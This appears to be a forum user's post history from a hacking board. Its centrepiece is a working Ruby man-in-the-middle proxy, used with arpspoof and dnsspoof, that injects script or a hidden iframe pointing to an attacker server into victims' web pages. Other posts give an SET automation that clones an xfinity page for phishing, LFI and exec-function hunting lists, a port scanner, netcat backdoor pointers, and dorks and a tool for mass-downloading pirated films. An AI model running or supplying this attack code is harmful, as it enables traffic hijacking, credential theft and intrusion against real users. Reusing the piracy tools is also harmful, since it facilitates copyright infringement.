-
Posts
939 -
Joined
-
Last visited
-
Days Won
22
Posts posted by i8igmac
-
-
This is one of those questions that come up all the time...
Your mac address and local ip is not displayed across the internet.
If your on a public wifi then I see no reason to worry about downloads...
-
i appropriate your response... i would like to share a dictionary i built for lfi scanning... i use some google dorks to build it...
255 possible files...
-
Now this is just a example, im looking for help on building a list or a dictionary
i have built a few scanners and crawlers, i have a idea... im sure its already been done but i like to do things my way...
lets say you use wget to crawl and download a entire site, now you have all contents download into tmp directory then use a linux command like grep(just for example) to find a string...
cat /tmp/site_crawl/ * | grep exec
echo exec(var)
echo pcntl_exec(var)
...
example of a list i would like to build...
passthru
system
exec
pcntl_exec
`` (backtick operator)
im looking for a universal list for finding ALL possibility's, not just php... i guess the goal is to find a way to execute or write data on the server...
maybe there are vulnerabilities for css, java, php etc... any string that may need further investigation...
this is just example, im sure you will never find any php exec etc in plain text...
-
I am also looking to start from the bottem, I'm looking into certs a+ sec+ net+
I would also like some advice, if I could get my foot in the door I feel I would succeed...
-
I have made a tool that will mass download from megaupload, huge time saver. There is no capture images (security image) so this makes my script simple...
As a paid user my tool could download 200 files at a time or as a free user 1 at a time with 30 second wait time...
Another feature is a Google crawl to find what ever file your looking for and if the links are still working...
Here is a tip, can be used with other file shares
Google search:
Inurl:"forum" intext:"megaupload.com/?d=" intext:"movie-file-name-year-2012" blueray
-
I have made a tool that will mass download from megaupload, huge time saver. There is no capture images (security image) so this makes my script simple...
As a paid user my tool could download 200 files at a time or as a free user 1 at a time with 30 second wait time...
Another feature is a Google crawl to find what ever file your looking for and if the links are still working...
Here is a tip, can be used with other file shares
Google search:
Inurl:"forum" intext:"megaupload.com/?d=" intext:"movie-file-name-year-2012" blueray
-
Hollywood sort of false advertise 'hacking'
This is a big reason why I spent endless hours learning.
"what is a cookie virus" from 1995 the movie hackers a cookie scrolls across the screen and supposavly eats up memery... A cookie is used when your web browser logs into a server, this cookie could be sniffed or stolen and give a hacker access to these websites
This was my first question ;p
-
I have updated the above script, when the string is found "<head>" the script insert's a small hello world script right after and modify's the content-length of the current packet to make room for the extra data...
all pages load properly and now i feel successful
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 P3P: CP="Facebook Set-Cookie: _e_0xIM_4=deleted X-Cnection: close Date: Fri, 13 Jan 2012 02:58:17 GMT Content-Length: 110 <html><head><title></title></head><body><span id="fbEmuTrackingSuccess">Success</span></body></html>
Only if the packet includes "Content-length:" AND the desired string "<head>" then the exploit will be inserted...
I have tried, searching for other strings like <script> <head> <body> etc... they all produce the same resaults
the problem is, what if none of these exist? then no pages will be modified...
what if there are several packets responding to one Get request that match up with my desired algorithm then there may be 10 exploits inserted on one page...
-
For testing, set your proxy settings for your browser to 80... my goal is to have all pages modified and still load perfectly...
my last test script
require 'eventmachine' attacker_ip="192.168.1.136" victim="192.168.1.110" gateway="192.168.1.1" dns = File.open("dns", "w+") dns.write("#{attacker_ip} *.*")# this is your ip, dns.close #"1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 ".split(/ /, 10).join # # set proxy settings in firefox to port 80 # uncommment these lines when you want to use arpsoof/dns #`pkill spoof` #a=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{victim} #{gateway}'"} #c=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{gateway} #{victim}'"} #b=Thread.new{system"xterm -e 'dnsspoof -i wlan0 -f dns'"} #a.run #b.run #c.run Thread.start{ class Client < EM::Connection def initialize(other, finger, *args, &blk) @other, @finger = other, finger super(*args, &blk) end def post_init send_data @finger.sub("Accept-Encoding:","Assept-Ensoding:") end def receive_data(response) clength = response.scan(/Content-Length: \d+/).to_s.sub("Content-Length: ","") #clength = response.scan(/Content-Length: \d+/).to_s.split.slice(1).to_i #+ 17 #puts clength = response.scan(/Content-Length: \d+/) #puts clength #print "\n" if response.scan("Content-Length: ").to_s == "" #&& response.scan("<body>").to_s == "" @other.send_data response else if response.scan("<head>").to_s == "" @other.send_data response else exploit="<script>alert('hello world')</script>" math=exploit.length puts response #@other.send_data response.sub("</title>","</titlE>\n<iframe src='http://192.168.1.103:8181/lol' width='0' height='0' </iframe>\n").sub("Content-Length: #{clength}","Content-Length: #{clength-clength}") #@other.send_data response.sub("</title>","</titlE><script>alert('hellow world')</script>").sub("Content-Length: #{clength}","Content-Length: #{clength-clength}") @other.send_data response.sub("<head>","<head>#{exploit}").sub("Content-Length: #{clength}","Content-Length: #{clength.to_i+math}") # .split(/ /, 9).join delete 9 blank spaces end end end end #browser open to http://192.168.1.114 module EchoServer def receive_data(finger) #finger is the header recived from the client, could log these cookies or log these pages #host = finger.to_a[1].chomp[6..-1] #host = finger.gsub(" ","").split[1].chomp[5..-1] #Thread.start{ ping = finger.gsub(" ","").index("Host:") pong = finger.gsub(" ","").index("\n",ping) host = finger.gsub(" ","")[ping..pong].gsub("Host:","").chomp #i dont know if this will prevent loading from cache data=finger.sub("If-None-Match:","If-None-MutXX:").sub("If-Modified-Since:","If-Modified-SXnce:") #print finger #puts host EventMachine::connect host, 80, Client, self, data # ask google for data end end } EventMachine::run { EventMachine::start_server attacker_ip, 80, EchoServer } # YOUR IP
-
Your meterpreter payload, is it reverse TCP? If so then you need to forward one more port to your bt5 machine, by default mtererpreter use's port 4444.
I don't see why port forwarding is a bad idea
Here is a tip for monitoring connection's works with linux or windows, on windows you may need to run cmd as administer
Netstat -np
-
I would like to share a script i put together about a year ago... it was a lot of fun building and there are so many other directions i could go with this script...
its a little hard to explain but here goes...
first thing is starting up your arpspoof/dnsspoof and listen for traffic on port 80
(victim GET/facebook/with user123 cookies) ---> (evil-proxy GET /facebook/with user123 cookies) ---> (facebook.com) -->response(evil-proxy-MODIFY-DATA)--->response(victim)
im working on a few problems right now, when you add bytes to the packet you have to change the frame length or else the page will load in the victim browser with incomplete code (the bottom half is missing)
I think i just figured it out... Total length is 1500 or '05 dc'
0000 00 15 00 48 8f c5 00 1a 73 91 01 9c 08 00 45 00 ...H.... s.....E.
0010 05 dc a4 d9 40 00 40 06 0b fc c0 a8 01 88 c0 a8 ....@.@. ........
with some math ill have to change this value
But here... give this a try...
install ruby with eventmachine...
close any application that has port 80 already in use
-
I have done a lot of testing with mitm attacks, i have tested all the tools mentioned in the video and many more...
my goal was to insert malicious code into 100% http tcp protocal, a good proof of concept or control point could be as simple as the use of a <iframe src="evil.com">
with all my testing, the most effective set up was dns spoofing all the traffic to my own ruby proxy running on port 66 that would modify the header fields, insert my evil code and send the packet to the client...
i could never get 100% efficiency... but my lab setup was limited...
-
-
These kinds of task are fun to automate your self... I have made a ruby script to find all movie files, delete duplicate, move all to another location and then delete original location...
*.mkv *.avi *.iso
-
Install irb on your droid. It's just a quick scanner I use for discovering services on my network... When I need to find my ftp server or rdp... No need to root your device...
Example: nmap -p 135,139,445,5900,8080,80,21,22 192.168.1.1-255
require 'socket' Thread.start{ for ip in 1..255 for port in [135,139,445,5900,80,8080,21,22] Thread.start{ begin t = TCPSocket.open("192.168.1.#{ip.to_s}", port) rescue print "e" else t.close puts"" puts "#{ip}:#{port} open ports!!!" end} sleep 0.1 end end }
Notes, if it crashes irb, set the sleep to 0.2 or higher. Your phone is limited on threads
The ip address must look like this*
"192.169.1.#{ip.to_s} "
"192.168.#{ip.to_s}.1"
"xxx.#{ip.to_s}.x.x"
"#{ip.to_s}.66.66.66"
You can add more ports,
-
http://www.tutorialspoint.com/ruby/ruby_sending_email.htm
You can find these examples in almost any language, I like ruby so here is how I would do it.
I could maybe write something tonight. This will get you started
-
i think my solid state hard drive crashed... so i just boot up from a live cd and tried to mount the hard drive and got this error
Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498149] Oops: 0000 [#1] SMP Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498151] last sysfs file: /sys/module/crc16/initstate Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498194] Process mount (pid: 3176, ti=f3562000 task=f656a640 task.ti=f3562000) Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498195] Stack: Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498204] Call Trace: Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498276] Code: 5b 5e 5f 5d c3 55 57 89 c7 56 53 e8 42 d6 12 00 8b 5f 04 83 c9 ff 8b 77 08 8b 2d b4 97 27 c1 eb 12 8b 14 8d f0 9c 3b c1 8b 47 14 <8b> 04 10 99 01 c3 11 d6 41 ba 20 00 00 00 89 e8 e8 aa 48 ff ff Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498290] EIP: [<c1140649>] __percpu_counter_sum+0x26/0x50 SS:ESP 0068:f3563d20 Message from syslogd@mint at Oct 24 20:28:07 ... kernel:[ 135.498292] CR2: 0000000001bee000
-
any tips on increasing traffic? im clueless!
-
Im looking to start my own forum, there are a few questions i have, i would like to start with a server from home but im not sure how to get traffic... what services would you recommend... i have read a little bit on meta tags but read this is no promise to bring traffic so maybe i could see some examples on how you have used meta tags to increase traffic on your site...
i have my own tools i code with ruby to perform small useful task for the site, so if i manage to get a forum up and fully functional i would then pay for a premaum service but are there any that include ruby?
-
i have built a lot of my own client tools with ruby to perform small automated task's. example http, ftp, ssh...
i used to host public servers for games like warcraft3 and counterstrike... i would like to build a client to connect to one of my servers to say "hello world"
require 'socket' server=socket.open("192.168.1.109", "6113") server.puts("data.needed.to.establish.connection") server.recv server.puts("data.needed.to.look.as.legit.client") server.recv server.puts("and more data") server.recv server.puts("hello to all people in the public server") server.recv exit
what i have done so far...
ill start up wireshark to start a live capture then with my game client ill connect to the server... now im trying to reduplicate in ruby what i see in wireshark...
is there a easy way to build a tool with this data i see in wireshark??? any one have experience with this?
-
a basic understanding of how server and client software work, i think would be a good start... for example install your first ftp server and properly configure your router, then have a friend from out side your home network download some files from your first ftp server...
google 'ftp server install tutorial'
google 'ftp server port forwarding'
google 'ftp client tutorial'
once you understand the difference between a client/server, things will make sense later on... (expression crawl before you walk)
i would pick a scripting language like perl/python/ruby... (RUBY!!!) i would go with ruby, i have a lot of fun working with sockets, learn how 2 computers communicate over the internet is very interesting and fun to learn... i could show you ruby example code for trojin/malware/rootkit Always lots of fun coding these!
get your self 2 computers at home and practice with netcat.exe (google netcat backdoor tutorial) you would have fun with this...
-
i thought i would share a quick example. im not sure what it is you want... you could accomplish anything with other scripting (learn ruby !!!)
save autoset.txt and execute this ruby script with root, SET needs root privileges
## autoset.txt
2 1 2 xfinity.comcast.net/constantguard/Alerts/ 2 2 666 no 777
#sudo ruby script.rb if `date`[0..2] == "mon"#Monday puts "lets do somehting" Thread.new { system("xterm -e 'xterm -e './set-automate autoset.txt''") } else puts "today is not Monday!" end
-
http://www.microsoft.com/technet/security/bulletin/MS10-090.mspx
Check out the metasploit module Ms10-09
This one is extremely popular right now
Look at the exploit source code.
-
(inurl:"forum" intext:"Lincoln Lawyer" intext:"megaupload.com/?d")
im looking for advice on improving this google search.
if you view google with that search, you will find a working link a few pages into the search (enjoy ,-P)
google outputs something like this
The.Lincoln.Lawyer.DVDRip.XviD-TARGET
ideees.xxx/forum/index.php?topic=376590.0 - Cached
You +1'd this publicly. Undo
Jul 1, 2011 – The Lincoln Lawyer (2011) Retail Date ..|.. 12-07-2011. Release Date ..|.. 28-06-2011. Source ..|. ... hxxp://xxx.megaupload.com/?d=1C02NXIN ...
im looking for help on increasing the size of the response google gives me, the 3 dots after the link! maybe i can modify the search to give all links that include megaupload... any tips that would give me better results please share
The.Lincoln.Lawyer.DVDRip.XviD-TARGET ideees.xxx/forum/index.php?topic=376590.0 - Cached You +1'd this publicly. Undo Jul 1, 2011 – The Lincoln Lawyer (2011) Retail Date ..| hxxp://megaupload.com/?d123451 hxxp://megaupload.com/?d123452 hxxp://megaupload.com/?d123453 hxxp://megaupload.com/?d123454 hxxp://megaupload.com/?d123455 hxxp://megaupload.com/?d123456 hxxp://megaupload.com/?d123457
i made a script that will process each link one at a time (as a free user) threw ruby sockets.
the time it takes searching threw that google response manually is time consuming... a search function will complete my script 8-X
automation, trailer.mp4 download from imdb,com
in Questions
Posted
I have a orginized list of movies, I have autoated movie cover dl, actor image dl and movie description document...
I'm compile this info into a website running on localhost. The most important feature is the trailer src that I strugle to automate this download... Omdb provides verry nice trailer that I hope to download OR just use the page/scrpt source...
I can engineer a proper get request for a single download but I notice its not consistent src location...
If some one can look at page src of i a mdb trailer. I don't have java script skill to defeat there security they try to prevent this...
I'm open for ideas, iframe src could be the main page but this is sloppy and I want to isolate the vido only....